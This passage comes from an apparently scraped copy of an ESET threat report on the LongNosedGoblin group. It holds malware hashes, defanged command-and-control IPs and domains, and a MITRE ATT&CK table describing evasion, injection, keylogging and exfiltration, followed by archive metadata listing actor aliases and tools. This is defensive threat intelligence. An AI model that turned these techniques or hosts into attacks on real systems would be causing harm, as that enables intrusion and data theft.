NosyHistorian.\r\nAC2264C56121141DAF75\r\n1A3852CD34F3ACB1D63C\r\nntrtscan.exe MSIL/Spy.Agent.EUU NosyHistorian.\r\n70A615BC580522E1EEE4\r\nB61394DC7A247FE47022\r\nntrtscan.exe MSIL/Spy.Agent.EUU NosyHistorian.\r\nE9C5E4AA335DFBD25786\r\n234A58CE4C9C551D1A41\r\noci.dll\r\nWin64/Kryptik_A\r\nGen.UW\r\nLoader of unknown\r\nmalware (possibly\r\nCobalt Strike).\r\nEC9CEB599DF3BDFFAD53\r\n6900D0E6D48E2E5FF12B\r\nmscorsvc.dll Win64/Kryptik.EHP\r\nLoader of unknown\r\nmalware (possibly\r\nCobalt Strike).\r\nNetwork\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 15 of 19\n\nIP Domain Hosting provider First seen Details\r\n118.107.234[.]26\r\nwww.sslvpn\r\nserver[.]com\r\nIRT‑IPSERVERONE‑MY 2022‑04‑09\r\nNosyDownloader\r\nC\u0026C server.\r\n103.159.132[.]30\r\nwww.thread\r\nstub[.]com\r\nIRT-FBP-MY 2023‑10‑03\r\nNosyDownloader\r\nC\u0026C server.\r\n101.99.88[.]113\r\nwww.blaze\r\nnewso[.]com\r\nShinjiru Technology Sdn\r\nBhd\r\n2024‑08‑23\r\nNosyDownloader\r\nC\u0026C server.\r\n118.107.234[.]29 N/A IRT‑IPSERVERONE‑MY 2023‑03‑20\r\nReverseSocks5\r\nserver.\r\n101.99.88[.]188\r\nwww.privacy\r\npolicy-my[.]com\r\nShinjiru Technology Sdn\r\nBhd administrator\r\n2024‑10‑23\r\nNosyDownloader\r\nC\u0026C server.\r\n38.54.17[.]131 N/A Kaopu Cloud HK Limited 2025‑03‑05\r\nServer hosting\r\nmalware, possibly\r\nCobalt Strike.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 18 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1585.003\r\nEstablish Accounts: Cloud\r\nAccounts\r\nLongNosedGoblin created accounts on cloud-based services for C\u0026C communication.\r\nT1588.001\r\nObtain Capabilities:\r\nMalware\r\nLongNosedGoblin likely used shared\r\nmalware that we named NosyDoor.\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nNosyDownloader executes PowerShell\r\ncommands.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nNosyDoor may execute commands via\r\ncmd.exe\r\n.\r\nT1106 Native API\r\nNosyStealer Stage 1 executes the next stage\r\nvia the LoadLibraryW API.\r\nPersistence\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nNosyDoor and NosyStealer are persisted\r\nusing Windows scheduled tasks.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 16 of 19\n\nTactic ID Name Description\r\nT1574.014\r\nHijack Execution Flow:\r\nAppDomainManager\r\nNosyDoor Stage 2 uses AppDomainManager\r\ninjection to run malicious code.\r\nDefense\r\nEvasion\r\nT1027.013\r\nObfuscated Files or\r\nInformation:\r\nEncrypted/Encoded File\r\nMalicious files embedded in NosyDoor Stage\r\n1 are encrypted via DES.\r\nT1027.015\r\nObfuscated Files or\r\nInformation: Compression\r\nNosyDownloader Stage 4 is compressed\r\nusing gzip.\r\nT1622 Debugger Evasion\r\nNosyLogger does not operate if a debugger is\r\npresent.\r\nT1480 Execution Guardrails\r\nSome samples of NosyDoor operate only on\r\nmachines with specific names.\r\nT1564.003\r\nHide Artifacts: Hidden\r\nWindow\r\nNosyDownloader creates a PowerShell\r\nprocess with a hidden window.\r\nT1562.001\r\nImpair Defenses: Disable\r\nor Modify Tools\r\nNosyDoor Stage 2, NosyStealer Stage 3, and\r\nNosyDownloader bypass AMSI.\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or\r\nLocation\r\nNosyHistorian Stage 1 was observed with the\r\nname Registry.pol, masquerading as a\r\nRegistry Policy file.\r\nT1218\r\nSigned Binary Proxy\r\nExecution\r\nNosyDoor Stage 1 executes the next stage by\r\nleveraging the legitimate\r\nUevAppMonitor.exe.\r\nT1055 Process Injection\r\nOne observed NosyStealer Stage 2 injects\r\nStage 3 to pmp.exe via CreateRemoteThread.\r\nThe other observed sample injects to\r\nnotepad.exe via SetThreadContext with\r\nResumeThread.\r\nT1620 Reflective Code Loading\r\nDonut has been used to execute NosyStealer\r\nStage 3 and Stage 4 in memory.\r\nDiscovery\r\nT1217\r\nBrowser Information\r\nDiscovery\r\nNosyHistorian collects browser history from\r\nGoogle Chrome, Microsoft Edge, and\r\nMozilla Firefox.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nNosyDoor can list files and directories.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 17 of 19\n\nTactic ID Name Description\r\nT1082\r\nSystem Information\r\nDiscovery\r\nNosyDoor obtains system information as part\r\nof C\u0026C beaconing.\r\nCollection\r\nT1056.001 Input Capture: Keylogging NosyLogger logs keystrokes.\r\nT1125 Video Capture\r\nLongNosedGoblin has used video recording\r\nsoftware, likely FFmpeg, to capture audio\r\nand video.\r\nT1560 Archive Collected Data NosyLogger encrypts collected data via AES.\r\nT1074.001\r\nData Staged: Local Data\r\nStaging\r\nNosyLogger stores pressed keys, window\r\nnames, and clipboard content to a file at a\r\nhardcoded path.\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nNosyDownloader uses HTTP to download\r\nfurther payload.\r\nT1105 Ingress Tool Transfer\r\nNosyDoor and NosyDownloader can\r\ndownload and run subsequent payloads.\r\nT1102.002\r\nWeb Service: Bidirectional\r\nCommunication\r\nNosyDoor uses Microsoft OneDrive as its\r\nC\u0026C server. NosyStealer uses Google Docs\r\nto receive a trigger command and to send\r\ndebug messages, and Google Drive to\r\nexfiltrate browser data.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nNosyDoor encrypts C\u0026C command outputs\r\nvia AES.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nNosyDoor uses RSA to encrypt metadata that\r\nis sent to the C\u0026C server.\r\nExfiltration T1567.002\r\nExfiltration Over Web\r\nService: Exfiltration to\r\nCloud Storage\r\nNosyStealer exfiltrates browser data to\r\nGoogle Drive.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 18 of 19\n\nSource: https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/" ], "report_names": [ "longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan" ], "threat_actors": [ { "id": "d67df52c-a901-4d55-b287-321818500789", "created_at": "2024-04-24T02:00:49.591518Z", "updated_at": "2026-04-10T02:00:05.314272Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "ToddyCat" ], "source_name": "MITRE:ToddyCat", "tools": [ "Cobalt Strike", "LoFiSe", "China Chopper", "netstat", "Pcexter", "Samurai" ], "source_id": "MITRE", "reports": null }, { "id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5", "created_at": "2022-10-25T16:07:24.329539Z", "updated_at": "2026-04-10T02:00:04.939013Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Operation Stayin’ Alive", "Storm-0247" ], "source_name": "ETDA:ToddyCat", "tools": [ "CHINACHOPPER", "China Chopper", "Cuthead", "FRP", "Fast Reverse Proxy", "Impacket", "Krong", "LoFiSe", "Ngrok", "PcExter", "PsExec", "SIMPOBOXSPY", "Samurai", "SinoChopper", "SoftEther VPN", "TomBerBil", "WAExp" ], "source_id": "ETDA", "reports": null }, { "id": "60d96824-1767-4b97-a6c7-7e9527458007", "created_at": "2023-01-06T13:46:39.378701Z", "updated_at": "2026-04-10T02:00:03.307846Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Websiic" ], "source_name": "MISPGALAXY:ToddyCat", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8e385d36-06a2-4294-b3d3-01fe8e9d95f4", "created_at": "2022-10-25T16:07:24.219051Z", "updated_at": "2026-04-10T02:00:04.902017Z", "deleted_at": null, "main_name": "Space Pirates", "aliases": [ "Erudite Mogwai", "Webworm" ], "source_name": "ETDA:Space Pirates", "tools": [ "9002 RAT", "Agent.dhwf", "AngryRebel", "BH_A006", "Chymine", "Darkmoon", "Deed RAT", "Destroy RAT", "DestroyRAT", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "Homux", "Hydraq", "Kaba", "Korplug", "McRAT", "MdmBot", "Moudour", "MyKLoadClient", "Mydoor", "PCRat", "PCShare", "POISONPLUG.SHADOW", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SnappyBee", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trochilus RAT", "XShellGhost", "Xamtrav", "Zupdax", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "3ede153b-35d6-447d-83f7-299dd1bedc64", "created_at": "2026-01-18T02:00:03.065065Z", "updated_at": "2026-04-10T02:00:03.902886Z", "deleted_at": null, "main_name": "LongNosedGoblin", "aliases": [], "source_name": "MISPGALAXY:LongNosedGoblin", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434507, "ts_updated_at": 1775792161, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.pdf", "text": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.txt", "img": "https://archive.orkl.eu/89a95122b0a4d563a054163efc886c6053bff9c8.jpg" } }